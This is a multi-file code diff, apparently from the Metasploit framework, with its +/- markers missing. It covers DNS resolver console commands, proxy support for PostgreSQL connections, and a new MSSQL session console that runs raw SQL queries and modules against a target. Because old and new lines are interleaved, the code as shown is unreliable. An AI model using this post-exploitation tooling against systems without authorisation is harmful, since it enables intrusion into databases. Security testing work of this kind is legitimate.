|
||||
resolver.reinit
|
||||
print_status('The DNS configuration has been reset')
|
||||
|
||||
if add_system_resolver
|
||||
# if the user requested that we add the system resolver
|
||||
system_resolver = Rex::Proto::DNS::UpstreamResolver.create_system
|
||||
# first find the default, catch-all rule
|
||||
default_rule = resolver.upstream_rules.find { |ur| ur.matches_all? }
|
||||
if default_rule.nil?
|
||||
resolver.add_upstream_rule([ system_resolver ])
|
||||
else
|
||||
# if the first resolver is for static hostnames, insert after that one
|
||||
if default_rule.resolvers.first&.type == Rex::Proto::DNS::UpstreamResolver::Type::STATIC
|
||||
index = 1
|
||||
else
|
||||
index = 0
|
||||
end
|
||||
default_rule.resolvers.insert(index, system_resolver)
|
||||
end
|
||||
end
|
||||
|
||||
print_dns
|
||||
|
||||
if ENV['PROXYCHAINS_CONF_FILE'] && !add_system_resolver
|
||||
print_warning('Detected proxychains but the system resolver was not added')
|
||||
end
|
||||
end
|
||||
|
||||
def reset_config_dns_help
|
||||
print_line "USAGE:"
|
||||
print_line " #{RESET_CONFIG_USAGE}"
|
||||
print_line @@reset_config_opts.usage
|
||||
print_line "EXAMPLES:"
|
||||
print_line " Reset the configuration without prompting to confirm"
|
||||
print_line " dns reset-config --yes"
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Delete all cached DNS answers
|
||||
#
|
||||
def flush_cache_dns
|
||||
resolver.cache.flush
|
||||
print_good('DNS cache flushed')
|
||||
end
|
||||
|
||||
#
|
||||
# Delete all user-configured DNS settings
|
||||
#
|
||||
def purge_dns
|
||||
driver.framework.dns_resolver.purge
|
||||
print_good('DNS entries purged')
|
||||
def flush_entries_dns
|
||||
resolver.flush
|
||||
print_good('DNS entries flushed')
|
||||
end
|
||||
|
||||
def flush_static_dns
|
||||
resolver.static_hostnames.flush
|
||||
print_good('DNS static hostnames flushed')
|
||||
end
|
||||
|
||||
#
|
||||
# Display the user-configured DNS settings
|
||||
#
|
||||
def print_dns
|
||||
results = driver.framework.dns_resolver.nameserver_entries
|
||||
columns = ['ID','Rule(s)', 'DNS Server', 'Comm channel']
|
||||
print_dns_set('Custom nameserver rules', results[0])
|
||||
default_domain = 'N/A'
|
||||
if resolver.defname? && resolver.domain.present?
|
||||
default_domain = resolver.domain
|
||||
end
|
||||
print_line("Default search domain: #{default_domain}")
|
||||
|
||||
# Default nameservers don't include a rule
|
||||
columns = ['ID', 'DNS Server', 'Comm channel']
|
||||
print_dns_set('Default nameservers', results[1])
|
||||
searchlist = resolver.searchlist
|
||||
case searchlist.length
|
||||
when 0
|
||||
print_line('Default search list: N/A')
|
||||
when 1
|
||||
print_line("Default search list: #{searchlist.first}")
|
||||
else
|
||||
print_line('Default search list:')
|
||||
searchlist.each do |entry|
|
||||
print_line(" * #{entry}")
|
||||
end
|
||||
end
|
||||
print_line("Current cache size: #{resolver.cache.records.length}")
|
||||
|
||||
print_line('No custom DNS nameserver entries configured') if results[0].length + results[1].length == 0
|
||||
upstream_rules = resolver.upstream_rules
|
||||
print_dns_set('Resolver rule entries', upstream_rules, ids: (1..upstream_rules.length).to_a)
|
||||
if upstream_rules.empty?
|
||||
print_line
|
||||
print_error('No DNS nameserver entries configured')
|
||||
end
|
||||
|
||||
tbl = Table.new(
|
||||
Table::Style::Default,
|
||||
'Header' => 'Static hostnames',
|
||||
'Prefix' => "\n",
|
||||
'Postfix' => "\n",
|
||||
'Columns' => ['Hostname', 'IPv4 Address', 'IPv6 Address'],
|
||||
'SortIndex' => -1,
|
||||
'WordWrap' => false
|
||||
)
|
||||
resolver.static_hostnames.each do |hostname, addresses|
|
||||
ipv4_addresses = addresses.fetch(Dnsruby::Types::A, [])
|
||||
ipv6_addresses = addresses.fetch(Dnsruby::Types::AAAA, [])
|
||||
0.upto([ipv4_addresses.length, ipv6_addresses.length].max - 1) do |idx|
|
||||
tbl << [idx == 0 ? hostname : TABLE_INDENT, ipv4_addresses[idx], ipv6_addresses[idx]]
|
||||
end
|
||||
end
|
||||
print_line(tbl.to_s)
|
||||
if resolver.static_hostnames.empty?
|
||||
print_line('No static hostname entries are configured')
|
||||
end
|
||||
end
|
||||
|
||||
private
|
||||
|
||||
SPECIAL_RESOLVERS = [
|
||||
Rex::Proto::DNS::UpstreamResolver::Type::BLACK_HOLE.to_s.downcase,
|
||||
Rex::Proto::DNS::UpstreamResolver::Type::SYSTEM.to_s.downcase
|
||||
].freeze
|
||||
|
||||
# XXX: By default rex-text tables strip preceding whitespace:
|
||||
# https://github.com/rapid7/rex-text/blob/1a7b63993
|
||||
# ca62fd9102665d6986f918ae42cae244e/lib/rex/text/table.rb#L221-L222
|
||||
# So use https://en.wikipedia.org/wiki/Non-breaking_space as a workaround for now. A change should exist in Rex-Text to support this requirement
|
||||
TABLE_INDENT = "\xc2\xa0\xc2\xa0\\_ ".freeze
|
||||
|
||||
#
|
||||
# Get user-friendly text for displaying the session that this entry would go through
|
||||
#
|
||||
def prettify_comm(comm, dns_server)
|
||||
if comm.nil?
|
||||
channel = Rex::Socket::SwitchBoard.best_comm(dns_server)
|
||||
def prettify_comm(comm, upstream_resolver)
|
||||
if !Rex::Socket.is_ip_addr?(upstream_resolver.destination)
|
||||
'N/A'
|
||||
elsif comm.nil?
|
||||
channel = Rex::Socket::SwitchBoard.best_comm(upstream_resolver.destination)
|
||||
if channel.nil?
|
||||
nil
|
||||
else
|
||||
@@ -297,32 +682,40 @@ class DNS
|
||||
end
|
||||
end
|
||||
|
||||
def print_dns_set(heading, result_set)
|
||||
def print_dns_set(heading, result_set, ids: [])
|
||||
return if result_set.length == 0
|
||||
if result_set[0][:wildcard_rules].any?
|
||||
columns = ['ID', 'Rules(s)', 'DNS Server', 'Comm channel']
|
||||
else
|
||||
columns = ['ID', 'DNS Server', 'Commm channel']
|
||||
end
|
||||
columns = ['#', 'Rule', 'Resolver', 'Comm channel']
|
||||
|
||||
tbl = Table.new(
|
||||
Table::Style::Default,
|
||||
'Header' => heading,
|
||||
'Prefix' => "\n",
|
||||
'Postfix' => "\n",
|
||||
'Columns' => columns
|
||||
)
|
||||
result_set.each do |hash|
|
||||
if columns.size == 4
|
||||
tbl << [hash[:id], hash[:wildcard_rules].join(','), hash[:dns_server], prettify_comm(hash[:comm], hash[:dns_server])]
|
||||
else
|
||||
tbl << [hash[:id], hash[:dns_server], prettify_comm(hash[:comm], hash[:dns_server])]
|
||||
end
|
||||
Table::Style::Default,
|
||||
'Header' => heading,
|
||||
'Prefix' => "\n",
|
||||
'Postfix' => "\n",
|
||||
'Columns' => columns,
|
||||
'SortIndex' => -1,
|
||||
'WordWrap' => false
|
||||
)
|
||||
result_set.each_with_index do |entry, index|
|
||||
tbl = append_resolver_cells!(tbl, entry, index: ids[index])
|
||||
end
|
||||
|
||||
print(tbl.to_s) if tbl.rows.length > 0
|
||||
end
|
||||
|
||||
def append_resolver_cells!(tbl, entry, prefix: [], suffix: [], index: nil)
|
||||
alignment_prefix = prefix.empty? ? [] : (['.'] * prefix.length)
|
||||
|
||||
if entry.resolvers.length == 1
|
||||
tbl << prefix + [index.to_s, entry.wildcard, entry.resolvers.first, prettify_comm(entry.comm, entry.resolvers.first)] + suffix
|
||||
elsif entry.resolvers.length > 1
|
||||
tbl << prefix + [index.to_s, entry.wildcard, '', ''] + suffix
|
||||
entry.resolvers.each do |resolver|
|
||||
tbl << alignment_prefix + ['.', TABLE_INDENT, resolver, prettify_comm(entry.comm, resolver)] + ([''] * suffix.length)
|
||||
end
|
||||
end
|
||||
tbl
|
||||
end
|
||||
|
||||
def resolver
|
||||
self.driver.framework.dns_resolver
|
||||
end
|
||||
@@ -331,4 +724,4 @@ end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
@@ -85,7 +85,7 @@ class Driver < Msf::Ui::Driver
|
||||
if Msf::FeatureManager.instance.enabled?(Msf::FeatureManager::DNS_FEATURE)
|
||||
dns_resolver = Rex::Proto::DNS::CachedResolver.new
|
||||
dns_resolver.extend(Rex::Proto::DNS::CustomNameserverProvider)
|
||||
dns_resolver.load_config
|
||||
dns_resolver.load_config if dns_resolver.has_config?
|
||||
|
||||
# Defer loading of modules until paths from opts can be added below
|
||||
framework_create_options = framework_create_options.merge({ 'CustomDnsResolver' => dns_resolver })
|
||||
|
||||
+5
-5
@@ -35,17 +35,17 @@ class MsfAutoload
|
||||
'PowerShell'
|
||||
elsif basename == 'ui' && abspath.end_with?("#{__dir__}/msf/core/module/ui", "#{__dir__}/msf/core/module/ui.rb", "#{__dir__}/rex/post/ui", "#{__dir__}/rex/post/ui.rb", "#{__dir__}/rex/post/meterpreter/extensions/stdapi/ui.rb")
|
||||
'UI'
|
||||
elsif basename == 'mysql' && abspath.end_with?("#{__dir__}/msf/core/exploit/remote/mysql.rb")
|
||||
'MYSQL'
|
||||
elsif basename == 'ssh' && abspath.end_with?("#{__dir__}/rex/proto/ssh")
|
||||
'Ssh'
|
||||
elsif basename == 'http' && abspath.end_with?("#{__dir__}/rex/proto/http")
|
||||
'Http'
|
||||
elsif basename == 'rftransceiver' && abspath.end_with?("#{__dir__}/rex/post/hwbridge/ui/console/command_dispatcher/rftransceiver.rb")
|
||||
'RFtransceiver'
|
||||
elsif basename == 'mysql' && abspath.end_with?("#{__dir__}/msf/base/sessions/mysql.rb")
|
||||
'MySQL'
|
||||
else
|
||||
super
|
||||
end
|
||||
super
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
@@ -145,7 +145,7 @@ class MsfAutoload
|
||||
'dcerpc_lsa' => 'DCERPC_LSA',
|
||||
'wdbrpc_client' => 'WDBRPC_Client',
|
||||
'sunrpc' => 'SunRPC',
|
||||
'mysql' => 'MYSQL',
|
||||
'mysql' => 'MySQL',
|
||||
'ldap' => 'LDAP',
|
||||
'sqli' => 'SQLi',
|
||||
'dhcp_server' => 'DHCPServer',
|
||||
|
||||
@@ -253,7 +253,7 @@ module Net # :nodoc:
|
||||
# #=> ["example.com","a.example.com","b.example.com"]
|
||||
#
|
||||
def searchlist
|
||||
@config[:searchlist].inspect
|
||||
@config[:searchlist].deep_dup
|
||||
end
|
||||
|
||||
# Set the resolver searchlist.
|
||||
@@ -350,7 +350,7 @@ module Net # :nodoc:
|
||||
# Return a string with the default domain
|
||||
#
|
||||
def domain
|
||||
@config[:domain].inspect
|
||||
@config[:domain].dup
|
||||
end
|
||||
|
||||
# Set the domain for the query
|
||||
|
||||
@@ -21,27 +21,31 @@ end
|
||||
class DnsTimeout # :nodoc: all
|
||||
|
||||
include SecondsHandle
|
||||
|
||||
|
||||
def initialize(seconds)
|
||||
if seconds.is_a? Numeric and seconds >= 0
|
||||
@timeout = seconds
|
||||
else
|
||||
raise DnsTimeoutArgumentError, "Invalid value for tcp timeout"
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def to_i
|
||||
@timeout
|
||||
end
|
||||
|
||||
def to_s
|
||||
if @timeout == 0
|
||||
if @timeout == 0
|
||||
@output
|
||||
else
|
||||
@timeout.to_s
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def pretty_to_s
|
||||
transform(@timeout)
|
||||
end
|
||||
|
||||
|
||||
def timeout
|
||||
unless block_given?
|
||||
raise DnsTimeoutArgumentError, "Block required but missing"
|
||||
|
||||
@@ -56,12 +56,12 @@ class Connection
|
||||
end
|
||||
end
|
||||
|
||||
def initialize(database, user, password=nil, uri = nil)
|
||||
def initialize(database, user, password=nil, uri = nil, proxies = nil)
|
||||
uri ||= DEFAULT_URI
|
||||
|
||||
@transaction_status = nil
|
||||
@params = { 'username' => user, 'database' => database }
|
||||
establish_connection(uri)
|
||||
establish_connection(uri, proxies)
|
||||
|
||||
# Check if the password supplied is a Postgres-style md5 hash
|
||||
md5_hash_match = password.match(/^md5([a-f0-9]{32})$/)
|
||||
@@ -121,6 +121,14 @@ class Connection
|
||||
end
|
||||
end
|
||||
|
||||
def address
|
||||
@conn.peerhost
|
||||
end
|
||||
|
||||
def port
|
||||
@conn.peerport
|
||||
end
|
||||
|
||||
def close
|
||||
raise "connection already closed" if @conn.nil?
|
||||
@conn.shutdown
|
||||
@@ -235,14 +243,15 @@ class Connection
|
||||
|
||||
# tcp://localhost:5432
|
||||
# unix:/tmp/.s.PGSQL.5432
|
||||
def establish_connection(uri)
|
||||
def establish_connection(uri, proxies)
|
||||
u = URI.parse(uri)
|
||||
case u.scheme
|
||||
when 'tcp'
|
||||
@conn = Rex::Socket.create(
|
||||
'PeerHost' => (u.host || DEFAULT_HOST).gsub(/[\[\]]/, ''), # Strip any brackets off (IPv6)
|
||||
'PeerPort' => (u.port || DEFAULT_PORT),
|
||||
'proto' => 'tcp'
|
||||
'proto' => 'tcp',
|
||||
'Proxies' => proxies
|
||||
)
|
||||
when 'unix'
|
||||
@conn = UNIXSocket.new(u.path)
|
||||
|
||||
+4
-4
@@ -98,15 +98,15 @@ require 'rex/sslscan/result'
|
||||
require 'rex/version'
|
||||
|
||||
# Overload the Kernel.sleep() function to be thread-safe
|
||||
Kernel.class_eval("
|
||||
Kernel.class_eval(<<-EOF, __FILE__, __LINE__ + 1)
|
||||
def sleep(seconds=nil)
|
||||
Rex::ThreadSafe.sleep(seconds)
|
||||
end
|
||||
")
|
||||
EOF
|
||||
|
||||
# Overload the Kernel.select function to be thread-safe
|
||||
Kernel.class_eval("
|
||||
Kernel.class_eval(<<-EOF, __FILE__, __LINE__ + 1)
|
||||
def select(rfd = nil, wfd = nil, efd = nil, to = nil)
|
||||
Rex::ThreadSafe.select(rfd, wfd, efd, to)
|
||||
end
|
||||
")
|
||||
EOF
|
||||
|
||||
@@ -5,6 +5,7 @@ require 'rex/post/meterpreter'
|
||||
require 'rex/post/smb'
|
||||
require 'rex/post/postgresql'
|
||||
require 'rex/post/mysql'
|
||||
require 'rex/post/mssql'
|
||||
|
||||
module Rex::Post
|
||||
|
||||
|
||||
@@ -0,0 +1,3 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/post/mssql/ui'
|
||||
@@ -0,0 +1,3 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/post/mssql/ui/console'
|
||||
@@ -0,0 +1,148 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module MSSQL
|
||||
module Ui
|
||||
###
|
||||
#
|
||||
# This class provides a shell driven interface to the MSSQL client API.
|
||||
#
|
||||
###
|
||||
class Console
|
||||
include Rex::Ui::Text::DispatcherShell
|
||||
|
||||
# Dispatchers
|
||||
require 'rex/post/mssql/ui/console/command_dispatcher'
|
||||
require 'rex/post/mssql/ui/console/command_dispatcher/core'
|
||||
require 'rex/post/mssql/ui/console/command_dispatcher/client'
|
||||
require 'rex/post/mssql/ui/console/command_dispatcher/modules'
|
||||
|
||||
#
|
||||
# Initialize the MSSQL console.
|
||||
#
|
||||
# @param [Msf::Sessions::MSSQL] session
|
||||
def initialize(session, opts={})
|
||||
# The mssql client context
|
||||
self.session = session
|
||||
self.client = session.client
|
||||
envchange = ::Rex::Proto::MSSQL::ClientMixin::ENVCHANGE
|
||||
prompt = "%undMSSQL @ #{client.sock.peerinfo} (#{client.initial_info_for_envchange(envchange: envchange::DATABASE)[:new]})%clr"
|
||||
history_manager = Msf::Config.mssql_session_history
|
||||
super(prompt, '>', history_manager, nil, :mssql)
|
||||
|
||||
# Queued commands array
|
||||
self.commands = []
|
||||
|
||||
# Point the input/output handles elsewhere
|
||||
reset_ui
|
||||
|
||||
enstack_dispatcher(::Rex::Post::MSSQL::Ui::Console::CommandDispatcher::Core)
|
||||
enstack_dispatcher(::Rex::Post::MSSQL::Ui::Console::CommandDispatcher::Client)
|
||||
enstack_dispatcher(::Rex::Post::MSSQL::Ui::Console::CommandDispatcher::Modules)
|
||||
|
||||
# Set up logging to whatever logsink 'core' is using
|
||||
if ! $dispatcher['mssql']
|
||||
$dispatcher['mssql'] = $dispatcher['core']
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Called when someone wants to interact with the mssql client. It's
|
||||
# assumed that init_ui has been called prior.
|
||||
#
|
||||
# @param [Proc] block
|
||||
# @return [Integer]
|
||||
def interact(&block)
|
||||
# Run queued commands
|
||||
commands.delete_if do |ent|
|
||||
run_single(ent)
|
||||
true
|
||||
end
|
||||
|
||||
# Run the interactive loop
|
||||
run do |line|
|
||||
# Run the command
|
||||
run_single(line)
|
||||
|
||||
# If a block was supplied, call it, otherwise return false
|
||||
if block
|
||||
block.call
|
||||
else
|
||||
false
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Queues a command to be run when the interactive loop is entered.
|
||||
#
|
||||
# @param [Object] cmd
|
||||
# @return [Object]
|
||||
def queue_cmd(cmd)
|
||||
self.commands << cmd
|
||||
end
|
||||
|
||||
#
|
||||
# Runs the specified command wrapper in something to catch meterpreter
|
||||
# exceptions.
|
||||
#
|
||||
# @param [Object] dispatcher
|
||||
# @param [Object] method
|
||||
# @param [Object] arguments
|
||||
# @return [FalseClass]
|
||||
def run_command(dispatcher, method, arguments)
|
||||
begin
|
||||
super
|
||||
rescue ::Timeout::Error
|
||||
log_error('Operation timed out.')
|
||||
rescue ::Rex::InvalidDestination => e
|
||||
log_error(e.message)
|
||||
rescue ::Errno::EPIPE, ::OpenSSL::SSL::SSLError, ::IOError
|
||||
self.session.kill
|
||||
rescue ::StandardError => e
|
||||
log_error("Error running command #{method}: #{e.class} #{e}")
|
||||
elog(e)
|
||||
end
|
||||
end
|
||||
|
||||
#
|
||||
# Logs that an error occurred and persists the callstack.
|
||||
#
|
||||
# @param [Object] msg
|
||||
# @return [Object]
|
||||
def log_error(msg)
|
||||
print_error(msg)
|
||||
|
||||
elog(msg, 'MSSQL')
|
||||
|
||||
dlog("Call stack:\n#{$@.join("\n")}", 'mssql')
|
||||
end
|
||||
|
||||
# @return [Msf::Sessions::MSSQL]
|
||||
attr_reader :session
|
||||
|
||||
# @return [MSSQL::Client]
|
||||
attr_reader :client
|
||||
|
||||
# @return [String]
|
||||
def database_name
|
||||
session.client.mssql_query('SELECT DB_NAME();')[:rows][0][0]
|
||||
end
|
||||
|
||||
# @param [Object] val
|
||||
# @return [String]
|
||||
def format_prompt(val)
|
||||
prompt = "%undMSSQL @ #{client.sock.peerinfo} (#{database_name})%clr > "
|
||||
substitute_colors(prompt, true)
|
||||
end
|
||||
|
||||
protected
|
||||
|
||||
attr_writer :session, :client # :nodoc:
|
||||
attr_accessor :commands # :nodoc:
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
@@ -0,0 +1,113 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/ui/text/dispatcher_shell'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module MSSQL
|
||||
module Ui
|
||||
###
|
||||
#
|
||||
# Base class for all command dispatchers within the MSSQL console user interface.
|
||||
#
|
||||
###
|
||||
module Console::CommandDispatcher
|
||||
include Msf::Ui::Console::CommandDispatcher::Session
|
||||
|
||||
#
|
||||
# Initializes an instance of the core command set using the supplied session and client
|
||||
# for interactivity.
|
||||
#
|
||||
# @param [Rex::Post::MSSQL::Ui::Console] console
|
||||
def initialize(console)
|
||||
super
|
||||
@msf_loaded = nil
|
||||
@filtered_commands = []
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the MSSQL client context.
|
||||
#
|
||||
# @return [MSSQL::Client]
|
||||
def client
|
||||
console = shell
|
||||
console.client
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the MSSQL session context.
|
||||
#
|
||||
# @return [Msf::Sessions::MSSQL]
|
||||
def session
|
||||
console = shell
|
||||
console.session
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the commands that meet the requirements
|
||||
#
|
||||
# @param [Object] all
|
||||
# @param [Object] reqs
|
||||
# @return [Object]
|
||||
def filter_commands(all, reqs)
|
||||
all.delete_if do |cmd, _desc|
|
||||
if reqs[cmd]&.any? { |req| !client.commands.include?(req) }
|
||||
@filtered_commands << cmd
|
||||
true
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
# @param [Object] cmd
|
||||
# @param [Object] line
|
||||
# @return [Symbol, nil]
|
||||
def unknown_command(cmd, line)
|
||||
if @filtered_commands.include?(cmd)
|
||||
print_error("The \"#{cmd}\" command is not supported by this session type (#{session.session_type})")
|
||||
return :handled
|
||||
end
|
||||
|
||||
super
|
||||
end
|
||||
|
||||
#
|
||||
# Return the subdir of the `documentation/` directory that should be used
|
||||
# to find usage documentation
|
||||
#
|
||||
# @return [String]
|
||||
def docs_dir
|
||||
::File.join(super, 'mssql_session')
|
||||
end
|
||||
|
||||
#
|
||||
# Returns true if the client has a framework object.
|
||||
#
|
||||
# Used for firing framework session events
|
||||
#
|
||||
# @return [TrueClass, FalseClass]
|
||||
def msf_loaded?
|
||||
return @msf_loaded unless @msf_loaded.nil?
|
||||
|
||||
# if we get here we must not have initialized yet
|
||||
|
||||
@msf_loaded = !session.framework.nil?
|
||||
@msf_loaded
|
||||
end
|
||||
|
||||
#
|
||||
# Log that an error occurred.
|
||||
#
|
||||
# @param [Object] msg
|
||||
# @return [Object]
|
||||
def log_error(msg)
|
||||
print_error(msg)
|
||||
|
||||
elog(msg, 'mssql')
|
||||
|
||||
dlog("Call stack:\n#{$ERROR_POSITION.join("\n")}", 'mssql')
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
@@ -0,0 +1,147 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'pathname'
|
||||
require 'reline'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module MSSQL
|
||||
module Ui
|
||||
###
|
||||
#
|
||||
# Core MSSQL client commands
|
||||
#
|
||||
###
|
||||
class Console::CommandDispatcher::Client
|
||||
|
||||
include Rex::Post::MSSQL::Ui::Console::CommandDispatcher
|
||||
|
||||
#
|
||||
# Initializes an instance of the core command set using the supplied console
|
||||
# for interactivity.
|
||||
#
|
||||
# @param [Rex::Post::MSSQL::Ui::Console] console
|
||||
def initialize(console)
|
||||
super
|
||||
|
||||
@db_search_results = []
|
||||
end
|
||||
|
||||
#
|
||||
# List of supported commands.
|
||||
#
|
||||
# @return [Hash{String->String}]
|
||||
def commands
|
||||
cmds = {
|
||||
'query' => 'Run a raw SQL query',
|
||||
'shell' => 'Enter a raw shell where SQL queries can be executed',
|
||||
}
|
||||
|
||||
reqs = {}
|
||||
|
||||
filter_commands(cmds, reqs)
|
||||
end
|
||||
|
||||
# @return [String]
|
||||
def name
|
||||
'MSSQL Client'
|
||||
end
|
||||
|
||||
# @param [Object] args
|
||||
# @return [FalseClass, TrueClass]
|
||||
def help_args?(args)
|
||||
return false unless args.instance_of?(::Array)
|
||||
|
||||
args.include?('-h') || args.include?('--help')
|
||||
end
|
||||
|
||||
# @return [Object]
|
||||
def cmd_shell_help
|
||||
print_line 'Usage: shell'
|
||||
print_line
|
||||
print_line 'Go into a raw SQL shell where SQL queries can be executed.'
|
||||
print_line 'To exit, type `exit`, `quit`, `end` or `stop`.'
|
||||
print_line
|
||||
end
|
||||
|
||||
# @param [Array] args
|
||||
# @return [Object]
|
||||
def cmd_shell(*args)
|
||||
cmd_shell_help && return if help_args?(args)
|
||||
|
||||
prompt_proc_before = ::Reline.prompt_proc
|
||||
|
||||
::Reline.prompt_proc = proc { |line_buffer| line_buffer.each_with_index.map { |_line, i| i > 0 ? 'SQL *> ' : 'SQL >> ' } }
|
||||
|
||||
stop_words = %w[stop s exit e end quit q].freeze
|
||||
|
||||
finished = false
|
||||
loop do
|
||||
begin
|
||||
raw_query = ::Reline.readmultiline('SQL >> ', use_history = true) do |multiline_input|
|
||||
finished = stop_words.include?(multiline_input.split.last)
|
||||
finished || (multiline_input.split.last && !multiline_input.split.last.end_with?('\\'))
|
||||
end
|
||||
rescue ::Interrupt
|
||||
finished = true
|
||||
ensure
|
||||
::Reline.prompt_proc = prompt_proc_before
|
||||
end
|
||||
|
||||
if finished
|
||||
print_status 'Exiting Shell mode.'
|
||||
return
|
||||
end
|
||||
|
||||
formatted_query = raw_query.split.map { |word| word.chomp('\\') }.reject(&:empty?).compact.join(' ')
|
||||
|
||||
print_status "Running SQL Command: '#{formatted_query}'"
|
||||
cmd_query(formatted_query)
|
||||
end
|
||||
end
|
||||
|
||||
# @return [Object]
|
||||
def cmd_query_help
|
||||
print_line 'Usage: query'
|
||||
print_line
|
||||
print_line 'Run a raw SQL query on the target.'
|
||||
print_line 'Examples:'
|
||||
print_line
|
||||
print_line ' query select @@version;'
|
||||
print_line ' query select user_name();'
|
||||
print_line ' query select name from master.dbo.sysdatabases;'
|
||||
print_line
|
||||
end
|
||||
|
||||
# @param [Array] result The result of an SQL query to format.
|
||||
def format_result(result)
|
||||
columns = ['#']
|
||||
|
||||
unless result.is_a?(Array)
|
||||
result.fields.each { |field| columns.append(field.name) }
|
||||
|
||||
::Rex::Text::Table.new(
|
||||
'Header' => 'Query Result',
|
||||
'Indent' => 4,
|
||||
'Columns' => columns,
|
||||
'Rows' => result.map.each.with_index { |row, i| [i, row].flatten }
|
||||
)
|
||||
end
|
||||
end
|
||||
|
||||
# @param [Array] args SQL query
|
||||
# @return [Object]
|
||||
def cmd_query(*args)
|
||||
if help_args?(args)
|
||||
cmd_query_help
|
||||
return
|
||||
end
|
||||
|
||||
query = args.join(' ').to_s
|
||||
client.mssql_query(query, true) || []
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
@@ -0,0 +1,61 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'rex/post/mssql'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module MSSQL
|
||||
module Ui
|
||||
###
|
||||
#
|
||||
# Core MSSQL client commands
|
||||
#
|
||||
###
|
||||
class Console::CommandDispatcher::Core
|
||||
|
||||
include Rex::Post::MSSQL::Ui::Console::CommandDispatcher
|
||||
|
||||
#
|
||||
# Initializes an instance of the core command set using the supplied session and client
|
||||
# for interactivity.
|
||||
#
|
||||
# @param [Rex::Post::MSSQL::Ui::Console] console
|
||||
|
||||
#
|
||||
# List of supported commands.
|
||||
#
|
||||
def commands
|
||||
cmds = {
|
||||
'?' => 'Help menu',
|
||||
'background' => 'Backgrounds the current session',
|
||||
'bg' => 'Alias for background',
|
||||
'exit' => 'Terminate the MSSQL session',
|
||||
'help' => 'Help menu',
|
||||
'irb' => 'Open an interactive Ruby shell on the current session',
|
||||
'pry' => 'Open the Pry debugger on the current session',
|
||||
'sessions' => 'Quickly switch to another session'
|
||||
}
|
||||
|
||||
reqs = {}
|
||||
|
||||
filter_commands(cmds, reqs)
|
||||
end
|
||||
|
||||
#
|
||||
# Core
|
||||
#
|
||||
def name
|
||||
'Core'
|
||||
end
|
||||
|
||||
def unknown_command(cmd, line)
|
||||
status = super
|
||||
|
||||
status
|
||||
end
|
||||
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
@@ -0,0 +1,95 @@
|
||||
# -*- coding: binary -*-
|
||||
|
||||
require 'pathname'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
module MSSQL
|
||||
module Ui
|
||||
###
|
||||
#
|
||||
# MSSQL client commands for running modules
|
||||
#
|
||||
###
|
||||
class Console::CommandDispatcher::Modules
|
||||
|
||||
include Rex::Post::MSSQL::Ui::Console::CommandDispatcher
|
||||
|
||||
|
||||
#
|
||||
# List of supported commands.
|
||||
#
|
||||
def commands
|
||||
cmds = {
|
||||
'run' => 'Run a module'
|
||||
}
|
||||
|
||||
reqs = {}
|
||||
|
||||
filter_commands(cmds, reqs)
|
||||
end
|
||||
|
||||
#
|
||||
# Modules
|
||||
#
|
||||
def name
|
||||
'Modules'
|
||||
end
|
||||
|
||||
def cmd_run_help
|
||||
print_line 'Usage: Modules'
|
||||
print_line
|
||||
print_line 'Run a module.'
|
||||
print_line
|
||||
end
|
||||
|
||||
#
|
||||
# Executes a module/script in the context of the mssql session.
|
||||
#
|
||||
def cmd_run(*args)
|
||||
if args.empty? || args.first == '-h' || args.first == '--help'
|
||||
cmd_run_help
|
||||
return true
|
||||
end
|
||||
|
||||
# Get the script name
|
||||
begin
|
||||
script_name = args.shift
|
||||
# First try it as a module if we have access to the Metasploit
|
||||
# Framework instance. If we don't, or if no such module exists,
|
||||
# fall back to using the scripting interface.
|
||||
if msf_loaded? && (mod = session.framework.modules.create(script_name))
|
||||
original_mod = mod
|
||||
reloaded_mod = session.framework.modules.reload_module(original_mod)
|
||||
|
||||
unless reloaded_mod
|
||||
error = session.framework.modules.module_load_error_by_path[original_mod.file_path]
|
||||
print_error("Failed to reload module: #{error}")
|
||||
|
||||
return
|
||||
end
|
||||
|
||||
opts = ''
|
||||
|
||||
opts << (args + [ "SESSION=#{session.sid}" ]).join(',')
|
||||
result = reloaded_mod.run_simple(
|
||||
'LocalInput' => shell.input,
|
||||
'LocalOutput' => shell.output,
|
||||
'OptionStr' => opts
|
||||
)
|
||||
|
||||
print_status("Session #{result.sid} created in the background.") if result.is_a?(Msf::Session)
|
||||
else
|
||||
# the rest of the arguments get passed in through the binding
|
||||
session.execute_script(script_name, args)
|
||||
end
|
||||
rescue StandardError => e
|
||||
print_error("Error in script: #{script_name}")
|
||||
elog("Error in script: #{script_name}", error: e)
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
@@ -23,8 +23,8 @@ module Rex
|
||||
# The mysql client context
|
||||
self.session = session
|
||||
self.client = session.client
|
||||
self.cwd = client.database
|
||||
prompt = "%undMySQL @ #{client.socket.peerinfo} (#{cwd})%clr"
|
||||
self.client.socket ||= self.client.io
|
||||
prompt = "%undMySQL @ #{client.socket.peerinfo} (#{database_name})%clr"
